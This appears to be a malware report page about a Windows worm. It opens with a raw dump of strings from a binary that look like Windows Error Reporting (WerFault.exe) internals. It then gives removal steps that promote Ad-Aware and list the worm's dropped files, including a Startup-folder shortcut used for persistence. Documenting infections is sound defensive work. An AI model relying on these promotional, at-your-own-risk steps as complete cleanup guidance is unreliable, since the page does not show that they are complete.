<FILESIZE>%u</FILESIZE>
<CREATIONDATE>d-d-d d:d:d</CREATIONDATE>
<NAME>%s</NAME>
<DATA>%s</DATA>
<ERROR>Failed at Step: %s with error 0x%x</ERROR>
%sDrivers\%s.sys
</%s>
<%s>%s</%s>
%u.%u.%u.%u
*.mrk
WER-%u-%u.sysdata.xml
Software\Microsoft\Windows\CurrentVersion\CEIPRole\RolesInWER
SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability\MemoryDiagnostic
Web Server
Software\Microsoft\Windows\Windows Error Reporting\Debug
%SystemRoot%\Minidump
0xx (0xx, 0xx, 0xx, 0xx)
%s\%2.2d%2.2d%2.2d-%u-%2.2d.dmp
*.dmp
Software\Microsoft\Windows\Windows Error Reporting
Software\Policies\Microsoft\Windows\Windows Error Reporting
\KernelObjects\SystemErrorPortReady
%s\%s
Microsoft.Windows.Setup
\WindowsErrorReportingServicePort
(0x%x): %s
%u %s
WindowsNTVersion
%u.%u
ErrorPort
\StringFileInfo\xx\%s
HKEY_USERS\
HKEY_CURRENT_CONFIG\
HKEY_CLASSES_ROOT\
HKEY_LOCAL_MACHINE\
HKEY_CURRENT_USER\
%s="%s"
%s.%s
%s %d
Software\Microsoft\Windows\Windows Error Reporting\Hangs
_NT_EXECUTABLE_IMAGE_PATH
wxmu.dmp
wxhu.dmp
axmu.dmp
axhu.dmp
hu.kdmp
mu.kdmp
hu.dmp
mu.dmp
Software\Microsoft\.NETFramework
NOT_TCPIP
sos.dll
version.xml
.version.xml
%s.xml
memory.hdmp
minidump.mdmp
Local\WERReportingForProcess%d
atk.kdmp
Software\Microsoft\Windows\Windows Error Reporting\Hangs\NHRTimes
%i|%d|%d
xxxxxxxxxxxxxxxx
xx
%d.%d.%d.%d
D:P(A;;GA;;;BA)(A;;GA;;;SY)(A;;GA;;;%s)
D:P(A;;GA;;;BA)(A;;GA;;;SY)(A;;GA;;;%s)S:(ML;;NR;;;HI)
dc.noreflect
dc.xpmemdump
dc.xpdata
dc.CustomDump
dc.expmodmem
dc.expmoddata
dc.OnDemandKdmp
dc.xpmodmem
dc.xpmoddata
default=%s
memory=%s
module=%s
.dbgcfg.ini
ElevatedDataCollectionStatus.txt
Open process failed unexpectedly: 0X%X
Attempting to cross-proc reporting process!
Elevation:Administrator!new:%s
Reflection attempt failed: 0X%X
Attempting to reflect reporting process!
Could not collect dump for reflection cross process: 0x%x
Could not collect xproc for reflection: 0x%x
CollectFile for reflection failed: 0x%x
Could not collect dump for cross process: 0x%x
CollectReflectionDump failed with: 0x%x
0 processes found for xproc module: %s
Could not collect cross dump from module: 0x%x
CollectCrossProcessModuleDumps failed: 0x%x
CollectCrossProcessDumps failed: 0x%x
KernelDump failed: 0x%x
ProcessHandle
%s|%s
rpcrt4
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebugProtected\AutoExclusionList
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebug\AutoExclusionList
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebugProtected
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebug
sntdll.dll
WerDiagController.dll
Software\Microsoft\Windows\Windows Error Reporting\Plugins
Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
Software\Microsoft\Windows\Windows Error Reporting\Plugins\FDR\CurrentSession
%s\%s\%u-%u.etl
%s\%s\%u-%u.etl_%d
Microsoft\Windows\FDR
%s-%d
Software\Microsoft\Windows\Windows Error Reporting\Plugins\DriverVerifier
Software\Microsoft\Windows\Windows Error Reporting\Plugins\AppRecorder
%d-AppRecorderEnabled
%s /stop
psr.exe
Software\Microsoft\Windows\Windows Error Reporting\RuntimeExceptionHelperModules
verifier.dll
nVerifier.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
lsvchost.exe
"%s" "%s" "%s"
%s\system32\cofire.exe
psapi.dll
sfc_os.dll
werfault.exe
%s\%s-(PID-%u)-%u
%s\%s-(PID-%u).dmp
%s\*-(PID-*)-*
SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\%s
SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit
kernel32.dll
kernelbase.dll
ReportingMode
WinShipAssert
WindowsMessageReportingB1
Windows
ws2_32.dll
Software\Microsoft\SQMClient\%s\AdaptiveSqm\ManifestInfo
%s\Sqm%d.bin
CorporateWerPortNumber
BypassDataThrottling
Software\Microsoft\Windows\Windows Error Reporting\Consent
Windows Problem Reporting
6.1.7600.16385 (win7_rtm.090713-1255)
WerFault.exe
Windows
Operating System
6.1.7600.16385
Microsoft-Windows-WER-Diag/Operational
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:3408
- Delete the original Worm file.
- Delete or disinfect the following files created/modified by the Worm:
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Security.lnk (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut251C.tmp (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut2618.tmp (5681 bytes)
C:\ProgramData\System32\1.bat (1372 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut258A.tmp (2673 bytes)
C:\ProgramData\System32\system.exe (6441 bytes)
C:\ProgramData\System32\Security.exe (10161 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.